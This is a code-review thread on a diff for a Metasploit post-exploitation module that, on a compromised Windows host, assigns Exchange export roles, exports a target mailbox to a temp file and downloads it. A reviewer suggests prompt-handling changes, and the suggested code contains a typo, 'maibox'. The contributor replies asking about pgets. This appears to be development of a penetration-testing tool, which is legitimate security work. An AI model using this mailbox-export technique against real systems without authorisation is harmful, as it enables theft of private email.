modules/post/windows/gather/exchange.rb

```diff
@@ -0,0 +1,159 @@
+        ],
+        'DefaultAction' => 'LIST'
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('FILTER', [ false, '[for EXPORT] Filter to use when exporting a mailbox (see description)' ]),
+        OptString.new('MAILBOX', [ false, '[for EXPORT, required] Mailbox to export' ]),
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptInt.new('TIMEOUT', [true, 'The maximum time (in seconds) to wait for any Powershell scripts to complete', 600])
+      ]
+    )
+  end
+
+  def execute_exchange_script(command)
+    base_script = File.read(File.join(Msf::Config.data_directory, 'post', 'powershell', 'exchange.ps1'))
+    # A hash is used as the replacement argument to avoid issues with backslashes in command
+    psh_script = base_script.sub('_COMMAND_', '_COMMAND_' => command)
+    compressed_script = compress_script(psh_script)
+    cmd_out, _runnings_pids, _open_channels = execute_script(compressed_script, datastore['TIMEOUT'])
+    while (d = cmd_out.channel.read)
+      # Only print the output coming from PowerShell that is inside <output> tags
+      d.scan(%r{<output>(.*?)</output>}) do |b|
+        b[0].split('<br>') do |l|
+          print_line(l.to_s)
+        end
+      end
+    end
+  end
+
+  def export_mailboxes(mailbox, filter)
+    # Get the target's TEMP path and generate a random filename to serve as the save path for the export action
+    temp_folder = get_env('TEMP')
+    random_filename = "#{Rex::Text.rand_text_alpha(16)}.tmp"
+    temp_save_path = "#{temp_folder}\\#{random_filename}"
+
+    # The Assign-Roles command is responsible for assigning the roles necessary for exporting,
+    # It's executed in a separate PowerShell session because these changes don't take effect until a new session is created
+    execute_exchange_script('Assign-Roles')
+    execute_exchange_script("Export-Mailboxes \"#{mailbox}\" \"#{filter}\" \"#{temp_save_path}\"")
+
+    # After script is done executing, check if the export save path exists on the target
+    if !file_exist?(temp_save_path)
+      print_error('Export file not created on target machine. Aborting.')
+      return
+    end
+
+    # Get the size of the newly made export file
+    stat = session.fs.file.stat(temp_save_path)
+    mb_size = (stat.stathash['st_size'] / 1024.0 / 1024.0).round(2)
+    print_status("Resulting export file size: #{mb_size} MB")
+    if mb_size > 50
+      print_warning('The resulting export file is large. You can reduce it by using the FILTER option to refine the amount of exported mail items.')
+
+      loop do
+        input = Readline.readline('Are you sure you want to download it? [Y/N]: ', true)
+        if input.casecmp('Y') == 0
+          break
+        elsif input.casecmp('N') == 0
+          print_error('Aborting download')
+          rm_f(temp_save_path)
+          return
+        end
```

Comment:
Instead looping and manually invoking `Readline` here (which is not guaranteed to work in all cases), we should use the `user_input` object to do the read. We'll also probably want an option that allows users to automatically skip any over-sized mailboxes so that this can be run unattended. A revised prompt could look like:
```suggestion
      if datastore['PromptLargeDownloads'] && user_input.respond_to?(:pgets)
        old_prompt = user_input.prompt
        user_input.prompt = "Do you want to download #{mb_size} MB for #{mailbox}? [y/N] "
        cont = pgets
        user_input.prompt = old_prompt
        return unless cont.match? /^y/i
      else
        print_status("Skipping over-sized mailbox #{maibox} (#{mb_size} MB)")
      end
```

Reply:
Is there an include I need to add to be able to use pgets? It doesn't seem like it's reference-able as it is right now, and I can't figure out how to add it.